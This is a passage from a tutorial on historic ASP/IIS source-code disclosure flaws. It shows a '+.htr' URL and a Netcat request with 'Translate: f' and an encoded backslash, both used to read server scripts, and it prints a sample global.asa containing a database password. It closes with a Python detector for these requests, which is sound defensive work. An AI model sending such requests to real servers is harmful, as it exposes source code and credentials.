Common ASP Security Vulnerabilities (3)

For example, the global.asa file on 10.11.11.15 can be obtained with the following URL: http://10.11.11.15/global.asa+.htr. Note the UID and PWD in the database connection string. This gives the hacker a user name and password:
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
    Set Db = Server.CreateObject("Commerce.DBServer")
    Db.ConnectionString = "DSN=TRANS.DB;UID=sa;PWD=N0T4U2C"
    Db.Application = "http://10.11.11.15/"
    Set Application("Db") = Db
End Sub
Sub Session_OnStart
    '==Visual InterDev Generated - DataConnection startspan==
    '--Project Data Connection
    Session("DataConn_ConnectionString") = "DSN=CERTSRV;DBQ=C:\WINNT2\SYSTEM32\CERTLOG\CERTSRV.MDB;DRIVERID=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
    Session("DataConn_ConnectionTimeout") = 15
    Session("DataConn_CommandTimeout") = 30
    Session("DataConn_RuntimeUserName") = ""
    Session("DataConn_RuntimePassword") = ""
    '==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>
Microsoft has already fixed this security vulnerability.
After the HTR security vulnerability was corrected, hackers found a new entry point: the Translate: f security vulnerability. The Translate: f module is part of WebDAV, designed by Microsoft for FrontPage 2000 and the FrontPage Server Extensions on Windows 2000. If a backslash (\) is appended to the requested file resource and Translate: f is present in the HTTP headers of the request, the Web server returns the completely unprocessed ASP source code.
The following is an HTTP request sent with Netcat (related URL: http://www.l0pht.com/~weld/netcat/), which can be used to obtain the source code of default.asp on 10.11.11.15:
$ nc 10.11.11.15 80
GET /default.asp%5C HTTP/1.0
Host: 10.11.11.15
User-Agent: Mozilla/4.0
Content-Length: 18
Content-Type: text/html
Translate: f

match=www&errors=0
Note: %5C is used in the GET request.
%5C is the hexadecimal ASCII representation of the backslash character (\).
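On the detection side, the two request shapes described above can be flagged in captured HTTP traffic. The following is an added example, not code from the original article; the function names, labels and sample requests are constructed for illustration, and treating .asp and .asa as the script extensions is an assumption.

```python
import re
from urllib.parse import unquote

SCRIPT_EXT = (".asp", ".asa")  # assumption: extensions that hold server-side script

def parse_request(raw):
    """Return (target, headers) from a raw HTTP request; header names lowercased."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    target = head[0].split()[1]
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers

def source_disclosure_findings(raw):
    """Flag the two request shapes described above; returns a list of labels."""
    target, headers = parse_request(raw)
    # Decode first so %5C and %2B are matched the same as a literal \ and +.
    path = unquote(target.split("?", 1)[0]).lower()
    hits = []
    # Script file requested with "+.htr" appended (the HTR case).
    if re.search(r"\.(asp|asa)\+\.htr$", path):
        hits.append("htr-suffix")
    # Script file with a trailing backslash plus a Translate: f header.
    if (headers.get("translate", "").lower() == "f"
            and path.endswith("\\")
            and path.rstrip("\\").endswith(SCRIPT_EXT)):
        hits.append("translate-f-backslash")
    return hits

# Constructed sample requests, built from the examples on this page.
HTR = "GET /global.asa+.htr HTTP/1.0\r\nHost: 10.11.11.15\r\n\r\n"
TRANSLATE = ("GET /default.asp%5C HTTP/1.0\r\nHost: 10.11.11.15\r\n"
             "Content-Length: 18\r\nTranslate: f\r\n\r\nmatch=www&errors=0")
NORMAL = "GET /default.asp HTTP/1.0\r\nHost: 10.11.11.15\r\n\r\n"
# An ordinary WebDAV fetch of a non-script file also carries Translate: f.
WEBDAV = "GET /docs/report.doc HTTP/1.1\r\nHost: 10.11.11.15\r\nTranslate: f\r\n\r\n"

if __name__ == "__main__":
    for name, req in [("htr", HTR), ("translate", TRANSLATE),
                      ("normal", NORMAL), ("webdav", WEBDAV)]:
        print(name, source_disclosure_findings(req))
```

The WEBDAV sample is not flagged because a Translate: f header on a non-script resource is normal WebDAV authoring traffic; only the combination with a trailing backslash on a script file is reported.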